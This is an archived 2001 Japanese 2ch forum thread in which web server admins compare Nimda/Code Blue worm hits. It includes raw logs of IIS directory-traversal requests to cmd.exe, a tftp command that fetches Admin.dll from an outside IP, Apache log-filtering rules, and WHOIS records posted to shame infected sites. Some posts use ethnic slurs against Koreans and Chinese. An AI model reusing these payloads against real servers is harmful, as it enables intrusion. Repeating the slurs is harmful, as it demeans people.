◆Code Blue◆ 2000厨は逝ってよし
http://www.zdnet.co.jp/help/howto/security/v08/02.html
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html
関連スレ
http://ton.2ch.sc/test/read.cgi?bbs=sec&key=997783469
トラフィックが無茶増えて苦しいぞ、うちの回線。
>Code Blueは対象にHTTP HEAD照会を送信し、対象からのレスポンスを検査します。
>IISがインストールされていることが分かると、Code BlueはHTTP GET要求を送信し、
って書いてあるけど、今来てるやつらはいきなりGET投げて来るから亜種だと思う。
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml
/_vti_bin/..%5c../..%5c..
あー、来てる来てる。こいつかあ。
↑こっからも飛んでくる。。。。。
こんなプロバイダには加入したくないものだ。。。。
http://memo.st.ryukoku.ac.jp/archive/200109.month/1197.html
203.***.***.*** しかこないですよ みなさんは?
自分のIPがそうなんじゃないの?
♪♪秋祭り♪♪
今回の奴は鯖のHTMLも書き換え、IE使ってる人にファイルをDLさせる
みたい。IEな人は MS01-020 のパッチ当てとくほうがいいね。
http://news.2ch.sc/test/read.cgi?bbs=news&key=1000822776&ls=50
なんで?
MSN関連スレの方が盛り上がってるね
http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml
まぁ祭りになりそうですね〜
何事かと思って色々調べてたんだけど、2chはやっぱみんな早いねぇ(感心)
恥ずかしながら最初に来たのがニイハオのIPだったんで、慌ててIP蹴ってた。
で、これがBlue?
うちもいきなりGETから入っているんですが・・・
↑にリンクしたけど、17日に報告されてる新作のNimdaと思われ
最近、Zone Alarmがよけいに警告増えてきた(T_T)
http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
ログの見え方的には
初代Code Redは NNNNNNNN ってNがいっぱい
Code Red2は XXXXXXXXXX ってXいっぱい
Code Blueは ・・・・よくわからん。
>>1の ISSKKのURL見てね
まぁ祭りになりそうですね〜
ログがあるはずだからその辺で見分けられるでしょう。
#わたしゃApache使いなのでわからんのです
CERTにも情報出たみたいだ。
http://www.cert.org/current/current_activity.html#port80
同じIPから概出の穴を舐めるように1セットで飛んでくる。
そんなとこまで舐めちゃイやん(バカ)
"GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
可能性が増えるようなアフガンの人がWormを作れる
わけないだろし。そもそも電気だってまともになさげ。
いくらタイムリーだからってラディンと結びつけるのは
単純だと思われ。
なんてのが来た、ゲ、内側かとか思ってしまった。
DNSサーバーの穴掘られてるのかしらん。
さては君誤爆だね?
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
の嵐。ほとんど韓国のIPだが、時に日本企業のもある。
何とかしてクレー。ページが重いよ。
ニムダ・・・ニムダ・・・ニ・ダ・・・ニダ・・・チョンじゃねーか(w
ここは、IIS無いんだから勘弁してよぉ〜。
IPが202.230.xx.xxだからなのか、キムチの国から
いっぱいいっぱいやってくる。
もうやめてぇ〜。鬱だし脳。
Apacheのな人向けのログ切り出しサンプル考えてみたです。
warmのゴミログとマトモなアクセスログと切り離せます
SetEnvIf Request_URI "default\.ida" warmlog
SetEnvIf Request_URI "cmd\.exe" warmlog
SetEnvIf Request_URI "root\.exe" warmlog
CustomLog /var/log/apache/warmlog combined env=warmlog
CustomLog /var/log/apache/accesslog combined env=!warmlog
さーて寝よ
はっきりいってウザイ・・・
ログ見てみると、どうやらそのようだね。
わーむだす。
???
>>46のスペルが違うな〜って思っただけ
s/warm/worm/
ノッタだけなので・・スマソ
スペル?知りません(爆
確かに韓国からも多いけど、com、net、eduからの訪問も。
なかにはinterqもはいってるんだけど、、、
おまえISPのくせになにやってんだゴルァ
おれはAN-HTTPDだけど、1時間ほど放っておいて飯を食べていたら、タスクバーが
ビカビカ光っているのを見てびびってしまった。
しかし、よく来るね。
基本的にCGIの動作確認用に使っているだけなので、そろそろポート80を閉じて
しまおう。ログ見るのあきた。
ns.****.co.jpとかからバンバン来る・・・
ドキュメントルートにc/winnt/system32/とフォルダをつくり
cmd.exeという名前でブラクラを置きました・・・
接続してくるサーバはリソース消費して落ちないのでしょうか
落ちてくれないと気が付かないのでしょうね・・・
カウンタでも作りましょう。わーむちゃんのログを隔離して解析するもよし。
/scripts/root.exe? の類の嵐。種類はいっぱい
ダミーのroot.exeを置いてるけど。誰か探ってんのかなと思ったら
来る奴みんな探っていってるから、これがblueかな?
本格的に始まったみたい
にしてて ほとんどIPアドレスのままなんだけど
httpd-access.logとかに
HostNameにうまく変える方法ないですか?
詳細きぼん♪
logresolve とかどうですか?
logresolve is a post-processing program to resolve IP-
adresses in Apache's access logfiles. To minimize impact
on your nameserver, logresolve has its very own internal
hash-table cache. This means that each IP number will only
be looked up the first time it is found in the log file.
赤虫のときに、ダミー置くとIISと判断されて集中砲火を食らう、という事例があったけど、
青虫ではどうなんだろうか?
負荷の問題ではなくそもそも逆引きがDNS登録されていないだけだから
それでは役に立たないと思われ。。
何が「KDDIの日本橋AP内に設置するため、空調・電源は万全です。」だ!!!
てめぇんとこの鯖がワームに感染してんじゃねーよ
確かにセキュリティー・ウィルス対策していますとは書いてねーけど。
管理者クビポンにしろ
http://www.kddis.ne.jp/new2/top.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
Domain Information: [ドメイン情報]
a. [ドメイン名] IISR.GR.JP
e. [そしきめい] いんたーねっとじょうほうせんりゃくけんきゅうしょ
f. [組織名] インターネット情報戦略研究所
g. [Organization] Internet Information Strategy Research Institute
k. [組織種別] 任意団体
l. [Organization Type] Group
m. [登録担当者] SA1256JP
n. [技術連絡担当者] SA1256JP
p. [ネームサーバ] ns1.iisr.gr.jp
p. [ネームサーバ] ns1.nava21.ne.jp
p. [ネームサーバ] ns3.nava21.ne.jp
y. [通知アドレス] asano@iisr.gr.jp
[状態] Connected (2002/03/31)
[登録年月日] 2000/10/03
[接続年月日] 2000/10/30
[最終更新] 2001/03/19 16:05:44 (JST)
n-nakako@nava21.co.jp
ニムダアタック晒し
Domain Information: [ドメイン情報]
a. [ドメイン名] KIDDYLAND.CO.JP
e. [そしきめい] かぶしきがいしゃきでいらんど
f. [組織名] 株式会社 キデイランド
g. [Organization] KIDDY LAND CO.,LTD
k. [組織種別] 株式会社
l. [Organization Type] Corporation
m. [登録担当者] SA235JP
n. [技術連絡担当者] KS1250JP
p. [ネームサーバ] ns.kiddyland.co.jp
p. [ネームサーバ] s-field1.sunfield.ne.jp
y. [通知アドレス] nsp-addr@sunfield.ne.jp
[状態] Connected (2002/03/31)
[登録年月日] 1997/12/02
[接続年月日] 1998/02/02
[最終更新] 2000/02/14 09:51:41 (JST)
nsp-addr@sunfield.ne.jp
- -> /c/winnt/system32/cmd.exe
- -> /d/winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
- -> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
- -> /msadc/..%5c../..%5c../..%5c/..\xc1^\../..\xc1^\../..\xc1^\../winnt/system32/cmd.exe
- -> /scripts/..\xc1^\../winnt/system32/cmd.exe
- -> /scripts/..\xc0/../winnt/system32/cmd.exe
- -> /scripts/..\xc0\xaf../winnt/system32/cmd.exe
- -> /scripts/..\xc1\x9c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%2f../winnt/system32/cmd.exe
http://www.zdnet.co.jp/news/0109/12/e_codeblue.html
bule green どれがどれ?
http://www.security.nl/misc/codered-stats/geodist.gif
203.141.185.132 - - [18/Sep/2001:22:27:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
Domain Information: [ドメイン情報]
a. [ドメイン名] OFFICETOKYO.CO.JP
e. [そしきめい]
f. [組織名] 東京事務所有限会社
g. [Organization] TOKYO JIMUSHO Co.,Ltd.
k. [組織種別] 有限会社
l. [Organization Type] Company
m. [登録担当者] TF198JP
n. [技術連絡担当者] TF198JP
p. [ネームサーバ] dns1.officetokyo.co.jp
p. [ネームサーバ] mars.kcom.ne.jp
y. [通知アドレス]
[状態] Connected (2002/03/31)
[登録年月日] 1997/03/28
[接続年月日] 1997/04/15
[最終更新] 1998/06/09 19:04:59 (JST)
Sunabe@kddcom.co.jp
もやばいです。
おそらくNimdaでしょう。
皆さんアクセスしないようにしましょう。
GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
ぎっしりこれで埋まってた。ようやくCodeRedが収まってきたと思ったら・・・。
ていうかこれCodeRed全盛の時よりももっとたくさんきてる気がするよ。
/c/winnt/system32/cmd.exe があると4発増える
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
GET /c/Admin.dll HTTP/1.0
ん?どういう意味?
210.91.255.164
66.125.116.35
211.196.186.105
202.62.120.21
211.186.149.122
バックドアが見つかったと思ってAdmin.dllっつーのを
送り込もうとして来るみたい。
その後はしばらく止んだり・・・と攻撃が散漫ですね
せめて韓国からのアクセスだけでも蹴れないもんでしょうかね、ふぅ。
ゲットしようとするならその名前のやばいファイル置いといて
反撃できないのかなぁ。
CRcreanみたいなやつ?
それどんなの?
Google検索でヒットせず・・・。
混乱してきた。
「ネットを舞台にした赤と緑の対決」 by ZDNet
ttp://www.zdnet.co.jp/broadband/0109/07/codegreen.html
>誰かが書いてたけど、Nimdaアクセスしてくるやつがcmd.exeを
Serverサイドで実行されると思われ。自滅してどうする。
サーバーがIISじゃなきゃ問題ない、とか?
べりさーんくす!いまから見てきます!
>>93
仕掛けるものにもよると思うけど、とりあえずうちはLinuxだから
平気です。
Nimda。
CodeBlueもCodeRedも関係ない。
同じ脆弱性もついてるけど、より悪質。
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
http://headlines.yahoo.co.jp/hl?a=20010919-00052271-reu-int
/.jpにtypoった奴+αのが載っててたよ・・。
今更だけどAdmin.dllも含む改訂版を書いておきます。
#Admin.dllは普通だと来ないと思うけど
SetEnvIf Request_URI "default\.ida" wormlog
SetEnvIf Request_URI "cmd\.exe" wormlog
SetEnvIf Request_URI "root\.exe" wormlog
SetEnvIf Request_URI "Admin\.dll" wormlog
CustomLog /var/log/apache/warmlog combined env=wormlog
CustomLog /var/log/apache/accesslog combined env=!wormlog
っていうかまたtypo。鬱だ。今度こそ
SetEnvIf Request_URI "default\.ida" wormlog
SetEnvIf Request_URI "cmd\.exe" wormlog
SetEnvIf Request_URI "root\.exe" wormlog
SetEnvIf Request_URI "Admin\.dll" wormlog
CustomLog /var/log/apache/wormlog combined env=wormlog
CustomLog /var/log/apache/accesslog combined env=!wormlog
100〜のスレッドの続きを読む